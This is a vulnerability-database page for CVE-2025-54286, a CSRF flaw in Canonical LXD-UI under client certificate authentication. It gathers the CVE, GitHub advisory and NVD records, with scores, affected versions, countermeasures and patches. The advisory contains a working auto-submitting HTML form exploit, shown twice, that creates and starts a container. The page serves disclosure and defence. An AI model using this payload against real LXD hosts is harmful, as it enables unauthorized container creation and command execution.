Vulnerability-Lookup

CVE-2025-54286 (GCVE-0-2025-54286)

Vulnerability from cvelistv5 – Published: 2025-10-02 09:12 – Updated: 2025-10-03 03:55

Title

CSRF Vulnerability When Using Client Certificate Authentication with the LXD-UI

Summary

Cross-Site Request Forgery (CSRF) in LXD-UI in Canonical LXD versions >= 5.0 on Linux allows an attacker to create and start container instances without user consent via crafted HTML form submissions exploiting client certificate authentication.

Severity ?

7.5 (High)


                        
                          CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:A/VC:H/VI:H/VA:H/SC:L/SI:L/SA:L

CWE

CWE-352 - Cross-Site Request Forgery (CSRF)

Assigner

canonical

References

URL

Tags

https://github.com/canonical/lxd/security/advisor…

Impacted products

	Vendor	Product	Version
	Canonical	LXD	Affected: 5.0 , < 5.0.5 (semver) Affected: 5.21 , < 5.21.4 (semver) Affected: 6.0 , < 6.5 (semver)

Credits

GMO Flatt Security Inc.

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2025-54286",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "total"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2025-10-02T00:00:00+00:00",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2025-10-03T03:55:38.219Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "references": [
          {
            "tags": [
              "exploit"
            ],
            "url": "https://github.com/canonical/lxd/security/advisories/GHSA-p8hw-rfjg-689h"
          }
        ],
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "LXD",
          "repo": "https://github.com/canonical/lxd",
          "vendor": "Canonical",
          "versions": [
            {
              "lessThan": "5.0.5",
              "status": "affected",
              "version": "5.0",
              "versionType": "semver"
            },
            {
              "lessThan": "5.21.4",
              "status": "affected",
              "version": "5.21",
              "versionType": "semver"
            },
            {
              "lessThan": "6.5",
              "status": "affected",
              "version": "6.0",
              "versionType": "semver"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "value": "GMO Flatt Security Inc."
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "supportingMedia": [
            {
              "base64": false,
              "type": "text/html",
              "value": "Cross-Site Request Forgery (CSRF) in LXD-UI in Canonical LXD versions \u0026gt;= 5.0 on Linux allows an attacker to create and start container instances without user consent via crafted HTML form submissions exploiting client certificate authentication."
            }
          ],
          "value": "Cross-Site Request Forgery (CSRF) in LXD-UI in Canonical LXD versions \u003e= 5.0 on Linux allows an attacker to create and start container instances without user consent via crafted HTML form submissions exploiting client certificate authentication."
        }
      ],
      "impacts": [
        {
          "capecId": "CAPEC-62",
          "descriptions": [
            {
              "lang": "en",
              "value": "CAPEC-62 Cross Site Request Forgery"
            }
          ]
        }
      ],
      "metrics": [
        {
          "cvssV4_0": {
            "Automatable": "NOT_DEFINED",
            "Recovery": "NOT_DEFINED",
            "Safety": "NOT_DEFINED",
            "attackComplexity": "HIGH",
            "attackRequirements": "PRESENT",
            "attackVector": "NETWORK",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "privilegesRequired": "NONE",
            "providerUrgency": "NOT_DEFINED",
            "subAvailabilityImpact": "LOW",
            "subConfidentialityImpact": "LOW",
            "subIntegrityImpact": "LOW",
            "userInteraction": "ACTIVE",
            "valueDensity": "NOT_DEFINED",
            "vectorString": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:A/VC:H/VI:H/VA:H/SC:L/SI:L/SA:L",
            "version": "4.0",
            "vulnAvailabilityImpact": "HIGH",
            "vulnConfidentialityImpact": "HIGH",
            "vulnIntegrityImpact": "HIGH",
            "vulnerabilityResponseEffort": "NOT_DEFINED"
          },
          "format": "CVSS",
          "scenarios": [
            {
              "lang": "en",
              "value": "GENERAL"
            }
          ]
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-352",
              "description": "CWE-352 Cross-Site Request Forgery (CSRF)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-10-02T10:43:46.978Z",
        "orgId": "cc1ad9ee-3454-478d-9317-d3e869d708bc",
        "shortName": "canonical"
      },
      "references": [
        {
          "url": "https://github.com/canonical/lxd/security/advisories/GHSA-p8hw-rfjg-689h"
        }
      ],
      "source": {
        "discovery": "EXTERNAL"
      },
      "title": "CSRF Vulnerability When Using Client Certificate Authentication with the LXD-UI"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "cc1ad9ee-3454-478d-9317-d3e869d708bc",
    "assignerShortName": "canonical",
    "cveId": "CVE-2025-54286",
    "datePublished": "2025-10-02T09:12:49.044Z",
    "dateReserved": "2025-07-18T07:59:07.916Z",
    "dateUpdated": "2025-10-03T03:55:38.219Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1",
  "vulnerability-lookup:meta": {
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2025-54286\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"total\"}], \"version\": \"2.0.3\", \"timestamp\": \"2025-10-02T13:28:12.224278Z\"}}}], \"references\": [{\"url\": \"https://github.com/canonical/lxd/security/advisories/GHSA-p8hw-rfjg-689h\", \"tags\": [\"exploit\"]}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2025-10-02T13:28:06.576Z\"}}], \"cna\": {\"title\": \"CSRF Vulnerability When Using Client Certificate Authentication with the LXD-UI\", \"source\": {\"discovery\": \"EXTERNAL\"}, \"credits\": [{\"lang\": \"en\", \"value\": \"GMO Flatt Security Inc.\"}], \"impacts\": [{\"capecId\": \"CAPEC-62\", \"descriptions\": [{\"lang\": \"en\", \"value\": \"CAPEC-62 Cross Site Request Forgery\"}]}], \"metrics\": [{\"format\": \"CVSS\", \"cvssV4_0\": {\"Safety\": \"NOT_DEFINED\", \"version\": \"4.0\", \"Recovery\": \"NOT_DEFINED\", \"baseScore\": 7.5, \"Automatable\": \"NOT_DEFINED\", \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"valueDensity\": \"NOT_DEFINED\", \"vectorString\": \"CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:A/VC:H/VI:H/VA:H/SC:L/SI:L/SA:L\", \"providerUrgency\": \"NOT_DEFINED\", \"userInteraction\": \"ACTIVE\", \"attackComplexity\": \"HIGH\", \"attackRequirements\": \"PRESENT\", \"privilegesRequired\": \"NONE\", \"subIntegrityImpact\": \"LOW\", \"vulnIntegrityImpact\": \"HIGH\", \"subAvailabilityImpact\": \"LOW\", \"vulnAvailabilityImpact\": \"HIGH\", \"subConfidentialityImpact\": \"LOW\", \"vulnConfidentialityImpact\": \"HIGH\", \"vulnerabilityResponseEffort\": \"NOT_DEFINED\"}, \"scenarios\": [{\"lang\": \"en\", \"value\": \"GENERAL\"}]}], \"affected\": [{\"repo\": \"https://github.com/canonical/lxd\", \"vendor\": \"Canonical\", \"product\": \"LXD\", \"versions\": [{\"status\": \"affected\", \"version\": \"5.0\", \"lessThan\": \"5.0.5\", \"versionType\": \"semver\"}, {\"status\": \"affected\", \"version\": \"5.21\", \"lessThan\": \"5.21.4\", \"versionType\": \"semver\"}, {\"status\": \"affected\", \"version\": \"6.0\", \"lessThan\": \"6.5\", \"versionType\": \"semver\"}], \"defaultStatus\": \"unaffected\"}], \"references\": [{\"url\": \"https://github.com/canonical/lxd/security/advisories/GHSA-p8hw-rfjg-689h\"}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"Cross-Site Request Forgery (CSRF) in LXD-UI in Canonical LXD versions \u003e= 5.0 on Linux allows an attacker to create and start container instances without user consent via crafted HTML form submissions exploiting client certificate authentication.\", \"supportingMedia\": [{\"type\": \"text/html\", \"value\": \"Cross-Site Request Forgery (CSRF) in LXD-UI in Canonical LXD versions \u0026gt;= 5.0 on Linux allows an attacker to create and start container instances without user consent via crafted HTML form submissions exploiting client certificate authentication.\", \"base64\": false}]}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-352\", \"description\": \"CWE-352 Cross-Site Request Forgery (CSRF)\"}]}], \"providerMetadata\": {\"orgId\": \"cc1ad9ee-3454-478d-9317-d3e869d708bc\", \"shortName\": \"canonical\", \"dateUpdated\": \"2025-10-02T10:43:46.978Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2025-54286\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2025-10-03T03:55:38.219Z\", \"dateReserved\": \"2025-07-18T07:59:07.916Z\", \"assignerOrgId\": \"cc1ad9ee-3454-478d-9317-d3e869d708bc\", \"datePublished\": \"2025-10-02T09:12:49.044Z\", \"assignerShortName\": \"canonical\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }
  }
}

GHSA-P8HW-RFJG-689H

Vulnerability from github – Published: 2025-10-02 21:23 – Updated: 2025-11-05 22:05

Summary

Canonical LXD CSRF Vulnerability When Using Client Certificate Authentication with the LXD-UI

Details

Description

OIDC authentication uses cookies with the SameSite=Strict attribute, preventing cookies from being sent with requests from other sites. Therefore, CSRF does not occur as long as web services in a Same Site relationship (same eTLD+1) with the origin running LXD-UI are trusted.

However, since the SameSite concept does not apply to client certificates, CSRF protection that doesn't rely on the SameSite attribute is necessary.

Note that when using cross-origin fetch API, client certificates are not sent in no-cors mode due to CORS restrictions (according to the WHATWG Fetch specification(https://fetch.spec.whatwg.org/#credentials), client certificates are treated as credentials), making cross-site attacks using fetch API difficult unless CORS settings are vulnerable. However, since LXD's API parses request bodies as JSON even when Content-Type is text/plain or application/x-www-form-urlencoded, CSRF attacks exploiting HTML form submissions are possible.

Reproduction Steps

Prepare a malicious website controlled by the attacker
Deploy the following HTML form to implement an attack that automatically creates instances when victims visit:

This exploit code automatically sends a JSON string as text/plain to create an instance when rendered.

Note that for this PoC to work, the specified profile (default) must have a Default instance storage pool configured. This is typically set in the default profile of projects created after storage pool creation.

<html>
<body>
<form enctype="text/plain" method="POST" action="https://lxd-host:8443/1.0/instances?project=default&target=" id="form">
<input type="hidden" name='{"' id="input">
<input type="submit">
</form>
<script>
const i = document.getElementById('input');
i.value = `":123,"name":"poc","type":"container","profiles":["default"], "source":{"alias":"24.04","mode":"pull","protocol":"simplestreams","server":"https://cloud-images.ubuntu.com/releases","type":"image"},"devices":{},"config":{},"start":true}`;
document.getElementById('form').submit();
</script>
</body>
</html>

Log in to LXD-UI with a user having permissions to create instances in the project (default) specified in step 2
Access the URL of the HTML file prepared in step 2 and confirm that an instance is created and started

Risk

The attack conditions require that the victim is already connected to LXD using client certificate authentication and that the attacker can lead the victim to a controlled website.

Possible actions through the attack include, depending on the victim's permissions, creating and starting arbitrary instances, and executing arbitrary commands inside containers using cloud-init.

Countermeasures

The most effective countermeasure is to strictly enforce Content-Type validation at API endpoints. Specifically, change the implementation to reject requests when Content-Type is not application/json. With this countermeasure, attackers cannot send proper JSON requests using Simple Requests (HTML form submissions) and must use fetch API with CORS. However, as long as proper CORS settings are implemented, client certificates are not sent with cross-origin fetch API requests, preventing the attack.

Additionally, implementing CSRF tokens or validating Origin/Referer headers could be considered as countermeasures, but these would create compatibility issues with the LXD command, which is another API client.

Patches

LXD Series	Status
6	Fixed in LXD 6.5
5.21	Fixed in LXD 5.21.4
5.0	Fixed in LXD 5.0.5
4.0	Ignored - No web UI

References

Reported by GMO Flatt Security Inc.

Severity ?

8.3 (High)


                  
                    CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H

7.5 (High)


                  
                    CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:A/VC:H/VI:H/VA:H/SC:L/SI:L/SA:L

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/canonical/lxd"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "5.0"
            },
            {
              "fixed": "5.0.5"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/canonical/lxd"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "5.1"
            },
            {
              "fixed": "5.21.4"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/canonical/lxd"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "6.0"
            },
            {
              "fixed": "6.5"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/canonical/lxd"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0.0.0-20220401034332-1e1349e3cbf3"
            },
            {
              "fixed": "0.0.0-20250827065555-0494f5d47e41"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-54286"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-352"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-10-02T21:23:44Z",
    "nvd_published_at": "2025-10-02T10:15:38Z",
    "severity": "HIGH"
  },
  "details": "### Description\nOIDC authentication uses cookies with the SameSite=Strict attribute, preventing cookies from being sent with requests from other sites. Therefore, CSRF does not occur as long as web services in a Same Site relationship (same eTLD+1) with the origin running LXD-UI are trusted.\n\nHowever, since the SameSite concept does not apply to client certificates, CSRF protection that doesn\u0027t rely on the SameSite attribute is necessary.\n\nNote that when using cross-origin fetch API, client certificates are not sent in no-cors mode due to CORS restrictions (according to the WHATWG Fetch specification(https://fetch.spec.whatwg.org/#credentials), client certificates are treated as credentials), making cross-site attacks using fetch API difficult unless CORS settings are vulnerable. However, since LXD\u0027s API parses request bodies as JSON even when `Content-Type` is `text/plain` or `application/x-www-form-urlencoded`, CSRF attacks exploiting HTML form submissions are possible.\n\n### Reproduction Steps\n1. Prepare a malicious website controlled by the attacker\n2. Deploy the following HTML form to implement an attack that automatically creates instances when victims visit:\n\nThis exploit code automatically sends a JSON string as text/plain to create an instance when rendered.\n\nNote that for this PoC to work, the specified profile (default) must have a Default instance storage pool configured. \nThis is typically set in the default profile of projects created after storage pool creation.\n\n```html\n\u003chtml\u003e\n\u003cbody\u003e\n\u003cform enctype=\"text/plain\" method=\"POST\" action=\"https://lxd-host:8443/1.0/instances?project=default\u0026target=\" id=\"form\"\u003e\n\u003cinput type=\"hidden\" name=\u0027{\"\u0027 id=\"input\"\u003e\n\u003cinput type=\"submit\"\u003e\n\u003c/form\u003e\n\u003cscript\u003e\nconst i = document.getElementById(\u0027input\u0027);\ni.value = `\":123,\"name\":\"poc\",\"type\":\"container\",\"profiles\":[\"default\"], \"source\":{\"alias\":\"24.04\",\"mode\":\"pull\",\"protocol\":\"simplestreams\",\"server\":\"https://cloud-images.ubuntu.com/releases\",\"type\":\"image\"},\"devices\":{},\"config\":{},\"start\":true}`;\ndocument.getElementById(\u0027form\u0027).submit();\n\u003c/script\u003e\n\u003c/body\u003e\n\u003c/html\u003e\n```\n\n3. Log in to LXD-UI with a user having permissions to create instances in the project (default) specified in step 2\n4. Access the URL of the HTML file prepared in step 2 and confirm that an instance is created and started\n\n### Risk\nThe attack conditions require that the victim is already connected to LXD using client certificate authentication and that the attacker can lead the victim to a controlled website.\n\nPossible actions through the attack include, depending on the victim\u0027s permissions, creating and starting arbitrary instances, and executing arbitrary commands inside containers using cloud-init.\n\n### Countermeasures\nThe most effective countermeasure is to strictly enforce `Content-Type` validation at API endpoints. \nSpecifically, change the implementation to reject requests when `Content-Type` is not `application/json`. With this countermeasure, attackers cannot send proper JSON requests using Simple Requests (HTML form submissions) and must use fetch API with CORS. However, as long as proper CORS settings are implemented, client certificates are not sent with cross-origin fetch API requests, preventing the attack.\n\nAdditionally, implementing CSRF tokens or validating Origin/Referer headers could be considered as countermeasures, but these would create compatibility issues with the LXD command, which is another API client.\n\n### Patches\n\n| LXD Series  | Status |\n| ------------- | ------------- |\n| 6 | Fixed in LXD 6.5  |\n| 5.21 | Fixed in LXD 5.21.4  |\n| 5.0 | Fixed in LXD 5.0.5  |\n| 4.0  | Ignored - No web UI  |\n\n### References\nReported by GMO Flatt Security Inc.",
  "id": "GHSA-p8hw-rfjg-689h",
  "modified": "2025-11-05T22:05:13Z",
  "published": "2025-10-02T21:23:44Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/canonical/lxd/security/advisories/GHSA-p8hw-rfjg-689h"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-54286"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/canonical/lxd"
    },
    {
      "type": "WEB",
      "url": "https://pkg.go.dev/vuln/GO-2025-4003"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:A/VC:H/VI:H/VA:H/SC:L/SI:L/SA:L",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Canonical LXD CSRF Vulnerability When Using Client Certificate Authentication with the LXD-UI"
}

FKIE_CVE-2025-54286

Vulnerability from fkie_nvd - Published: 2025-10-02 10:15 - Updated: 2025-10-22 15:47

Severity ?

8.8 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Summary

References

	URL	Tags
	security@ubuntu.com	https://github.com/canonical/lxd/security/advisories/GHSA-p8hw-rfjg-689h	Exploit, Vendor Advisory
	134c704f-9b21-4f2e-91b3-4a467353bcc0	https://github.com/canonical/lxd/security/advisories/GHSA-p8hw-rfjg-689h	Exploit, Vendor Advisory

Impacted products

Vendor	Product	Version
canonical	lxd	*
canonical	lxd	*
canonical	lxd	*
linux	linux_kernel	-

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:canonical:lxd:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "2AAD226D-C742-4760-9F7E-88F73AFA90DE",
              "versionEndExcluding": "5.0.5",
              "versionStartIncluding": "5.0.0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:canonical:lxd:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "873DE516-61FD-46A3-8C62-C9665C4A8563",
              "versionEndExcluding": "5.21.4",
              "versionStartIncluding": "5.21.0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:canonical:lxd:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "CCADB2F1-F122-4A17-88DD-F3FDD4ED796B",
              "versionEndExcluding": "6.5",
              "versionStartIncluding": "6.1",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        },
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "703AF700-7A70-47E2-BC3A-7FD03B3CA9C1",
              "vulnerable": false
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ],
      "operator": "AND"
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Cross-Site Request Forgery (CSRF) in LXD-UI in Canonical LXD versions \u003e= 5.0 on Linux allows an attacker to create and start container instances without user consent via crafted HTML form submissions exploiting client certificate authentication."
    }
  ],
  "id": "CVE-2025-54286",
  "lastModified": "2025-10-22T15:47:31.957",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 8.8,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "REQUIRED",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 2.8,
        "impactScore": 5.9,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ],
    "cvssMetricV40": [
      {
        "cvssData": {
          "Automatable": "NOT_DEFINED",
          "Recovery": "NOT_DEFINED",
          "Safety": "NOT_DEFINED",
          "attackComplexity": "HIGH",
          "attackRequirements": "PRESENT",
          "attackVector": "NETWORK",
          "availabilityRequirement": "NOT_DEFINED",
          "baseScore": 7.5,
          "baseSeverity": "HIGH",
          "confidentialityRequirement": "NOT_DEFINED",
          "exploitMaturity": "NOT_DEFINED",
          "integrityRequirement": "NOT_DEFINED",
          "modifiedAttackComplexity": "NOT_DEFINED",
          "modifiedAttackRequirements": "NOT_DEFINED",
          "modifiedAttackVector": "NOT_DEFINED",
          "modifiedPrivilegesRequired": "NOT_DEFINED",
          "modifiedSubAvailabilityImpact": "NOT_DEFINED",
          "modifiedSubConfidentialityImpact": "NOT_DEFINED",
          "modifiedSubIntegrityImpact": "NOT_DEFINED",
          "modifiedUserInteraction": "NOT_DEFINED",
          "modifiedVulnAvailabilityImpact": "NOT_DEFINED",
          "modifiedVulnConfidentialityImpact": "NOT_DEFINED",
          "modifiedVulnIntegrityImpact": "NOT_DEFINED",
          "privilegesRequired": "NONE",
          "providerUrgency": "NOT_DEFINED",
          "subAvailabilityImpact": "LOW",
          "subConfidentialityImpact": "LOW",
          "subIntegrityImpact": "LOW",
          "userInteraction": "ACTIVE",
          "valueDensity": "NOT_DEFINED",
          "vectorString": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:A/VC:H/VI:H/VA:H/SC:L/SI:L/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
          "version": "4.0",
          "vulnAvailabilityImpact": "HIGH",
          "vulnConfidentialityImpact": "HIGH",
          "vulnIntegrityImpact": "HIGH",
          "vulnerabilityResponseEffort": "NOT_DEFINED"
        },
        "source": "security@ubuntu.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2025-10-02T10:15:38.427",
  "references": [
    {
      "source": "security@ubuntu.com",
      "tags": [
        "Exploit",
        "Vendor Advisory"
      ],
      "url": "https://github.com/canonical/lxd/security/advisories/GHSA-p8hw-rfjg-689h"
    },
    {
      "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
      "tags": [
        "Exploit",
        "Vendor Advisory"
      ],
      "url": "https://github.com/canonical/lxd/security/advisories/GHSA-p8hw-rfjg-689h"
    }
  ],
  "sourceIdentifier": "security@ubuntu.com",
  "vulnStatus": "Analyzed",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-352"
        }
      ],
      "source": "security@ubuntu.com",
      "type": "Secondary"
    }
  ]
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2025-54286 (GCVE-0-2025-54286)

GHSA-P8HW-RFJG-689H

Description

Reproduction Steps

Risk

Countermeasures

Patches

References

FKIE_CVE-2025-54286

Tags

Sightings

Nomenclature